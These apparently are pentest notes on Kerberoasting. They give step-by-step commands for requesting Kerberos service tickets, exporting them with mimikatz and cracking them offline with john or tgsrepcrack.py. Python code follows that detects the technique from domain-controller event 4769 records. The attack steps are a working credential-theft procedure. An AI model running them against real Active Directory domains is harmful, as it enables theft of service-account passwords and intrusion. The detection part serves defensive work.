# using mimikatz

* Method 1

Type steps 1 and 2 in PowerShell or cmd; this will generate the requested service ticket.

1. `Add-Type -AssemblyName System.IdentityModel`
2. `New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"`. To get the SPN, go to BloodHound > select the service account > Node Info > SPN, or use **PowerView** with the command **`Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname`**
3. Run `mimikatz.exe privilege::debug`
4. `kerberos::list /export` to download the service ticket
5. `exit` to exit mimikatz
6. `dir` to check the output, select the desired file and transfer it to your Linux machine (if netcat is used, transfer it in binary)
7. `kirbi2john <file> > hash.txt`
8. `john hash.txt --wordlist=rockyou.txt`

* Method 2

1. Follow Method 1 through step **5** to export the service ticket, then run `./tgsrepcrack.py <wordlist> <.kirbi file>`
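
From the detection side, the ticket requests in steps 1 and 2 are recorded on the domain controller as Security event 4769 ("A Kerberos service ticket was requested"). The following is an added example, not part of the original notes: it flags accounts that request RC4 service tickets for several user-account services in a short window. The sample records, the threshold and the shortened field names are constructed assumptions, and it assumes the domain otherwise issues AES tickets so that RC4 (`0x17`) stands out.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # etype 23, the ticket type that stands out here
WINDOW = timedelta(minutes=5)  # assumed window, tune per environment
MIN_SERVICES = 3               # assumed threshold, tune per environment

# Constructed records shaped like event 4769. Keys are shorthand for
# TargetUserName, ServiceName and TicketEncryptionType; all names are made up.
EVENTS = [
    {"time": "2024-05-01T10:00:05", "user": "alice@CORP.LOCAL", "service": "FILESRV01$", "etype": "0x12"},
    {"time": "2024-05-01T10:00:40", "user": "alice@CORP.LOCAL", "service": "svc_sql", "etype": "0x12"},
    {"time": "2024-05-01T10:01:10", "user": "bob@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-05-01T10:01:30", "user": "bob@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-05-01T10:02:05", "user": "bob@CORP.LOCAL", "service": "svc_tgs", "etype": "0x17"},
    {"time": "2024-05-01T10:03:00", "user": "carol@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-05-01T11:30:00", "user": "carol@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
]

def is_candidate(ev):
    """True for an RC4 ticket issued for a service that runs as a user account."""
    svc = ev["service"].lower()
    return (ev["etype"].lower() == RC4_HMAC
            and not svc.endswith("$")   # machine accounts use long random passwords
            and svc != "krbtgt")

def find_bursts(events, window=WINDOW, min_services=MIN_SERVICES):
    """Return {user: [services]} for users who requested RC4 tickets for at
    least min_services distinct user-account services inside one window."""
    per_user = defaultdict(list)
    for ev in filter(is_candidate, events):
        per_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    flagged = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            seen = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(seen) >= min_services:
                flagged[user] = sorted(seen)
                break
    return flagged

if __name__ == "__main__":
    for user, services in find_bursts(EVENTS).items():
        print(f"possible Kerberoasting: {user} -> {services}")
```

A single-SPN request, as in Method 1, stays under this threshold; lowering `MIN_SERVICES` to 1 reports every RC4 ticket for a user-account service, which is workable once service accounts are set to AES only.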
